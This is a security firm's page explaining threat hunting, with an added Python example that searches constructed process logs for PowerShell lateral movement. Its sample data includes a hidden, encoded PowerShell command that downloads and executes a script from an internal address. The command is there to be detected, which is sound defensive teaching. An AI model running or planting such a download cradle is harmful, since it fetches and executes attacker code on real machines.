
Threat Hunting

Proactively searching IT/OT infrastructure to detect threats that have evaded automated detection systems - conducted by experienced analysts.

What is Threat Hunting?

Threat Hunting is a proactive approach to threat detection in which security analysts actively search the organisation’s IT environment for signs of compromise that have not been detected by automated systems (SIEM, EDR, NDR). Instead of waiting for an alert, the hunter formulates a hypothesis about a possible threat and verifies it by analysing telemetry data.

The threat hunting process begins with a hypothesis - e.g. “An attacker may be using PowerShell for lateral movement in our network”. The hunter then collects and analyses data: system logs, network traffic, EDR data, DNS queries - looking for patterns that confirm or refute the hypothesis. Hypothesis sources may include threat intelligence reports, frameworks such as MITRE ATT&CK, penetration test results or anomalies observed in data.
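As an added example, not part of the original page or of the company's own tooling, the hunt loop described above carried out in Python for the PowerShell lateral-movement hypothesis: a handful of constructed Sysmon-style process-creation events stand in for real telemetry, and the analysis looks for PowerShell started by a remote-execution host process or with an encoded command, decoding the payload so the hunter can read what actually ran. The parent-process list, the field names and the sample events are assumptions of this example.

```python
"""Hypothesis-driven hunt over constructed process-creation telemetry.

Hypothesis (from the page): an attacker may be using PowerShell for lateral
movement. Signals checked: powershell.exe/pwsh.exe started by a remote-execution
host process (WinRM's wsmprovhost.exe, WMI's wmiprvse.exe, service-based tooling
via services.exe) and/or started with an -EncodedCommand payload, which is then
decoded so the hunter can read what was run.
All events below are constructed Sysmon Event ID 1-style records, not real logs.
"""
import base64
import re
from collections import Counter

# Assumption of this example: parents that indicate PowerShell was launched
# through a remote-execution channel rather than by an interactive user.
REMOTE_EXEC_PARENTS = {"wsmprovhost.exe", "wmiprvse.exe", "services.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# -ExecutionPolicy starts with -ex, so the pattern does not match it.
ENC_FLAG = re.compile(r"(?i)\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")


def encode_ps(command: str) -> str:
    """Encode a command the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str):
    """Reverse encode_ps; return None if the blob is not a valid encoded command."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample telemetry (host, user, parent image, image, command line).
CONSTRUCTED_EVENTS = [
    {"host": "WS01", "user": "CORP\\alice", "parent": "explorer.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"host": "SRV02", "user": "CORP\\svc_backup", "parent": "wsmprovhost.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc "
     + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')")},
    {"host": "SRV03", "user": "CORP\\svc_backup", "parent": "wmiprvse.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe -c whoami"},
    {"host": "SRV03", "user": "NT AUTHORITY\\SYSTEM", "parent": "services.exe",
     "image": "cmd.exe", "cmdline": "cmd.exe /c net start"},
]


def hunt_powershell_lateral_movement(events):
    """Return the events that support the hypothesis, each with its reasons."""
    findings = []
    for ev in events:
        if ev["image"].lower() not in {"powershell.exe", "pwsh.exe"}:
            continue
        reasons, decoded = [], None
        parent = ev["parent"].lower()
        if parent in REMOTE_EXEC_PARENTS:
            reasons.append(f"spawned by remote-execution host {parent}")
        m = ENC_FLAG.search(ev["cmdline"])
        if m:
            decoded = decode_ps(m.group(1))
            reasons.append("encoded command" if decoded else "encoded command (undecodable)")
        if reasons:
            findings.append({**ev, "reasons": reasons, "decoded": decoded})
    return findings


def summarise(findings):
    """Count (host, reason) pairs so the hunter can see where to pivot next."""
    return Counter((f["host"], r) for f in findings for r in f["reasons"])


if __name__ == "__main__":
    hits = hunt_powershell_lateral_movement(CONSTRUCTED_EVENTS)
    for f in hits:
        print(f["host"], f["user"], "|", "; ".join(f["reasons"]))
        if f["decoded"]:
            print("   decoded:", f["decoded"])
    print(summarise(hits))
```

Run as-is, the interactive backup script on WS01 is left alone, the WinRM-spawned encoded download cradle on SRV02 and the WMI-spawned shell on SRV03 come back as findings, and the per-host summary tells the hunter which host and user to pivot on next (here the shared service account). A confirmed finding like the SRV02 one is exactly what should then be turned into a standing detection rule.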

A mature threat hunting programme requires several elements: skilled analysts experienced in malware and network analysis, rich telemetry data sources, analysis tools (SIEM, analytics platforms, forensic tools) and processes for documenting findings, sharing them and turning confirmed hunts into automated detections, so that the same technique is caught next time without a hunter.

Why does it matter?

Automated detection systems, however effective, do not catch every threat, particularly advanced actors (APTs) using living-off-the-land techniques that rely on legitimate, signed system tools. Industry dwell-time reports still measure the median time from compromise to detection in days to weeks, and long-running intrusions go unnoticed for months. Regular threat hunting shortens this window and enables detection of threats before serious damage occurs.

Need help in this area?

Our experts will help you assess the risk and plan next steps.

Talk to an expert: +48 22 292 32 23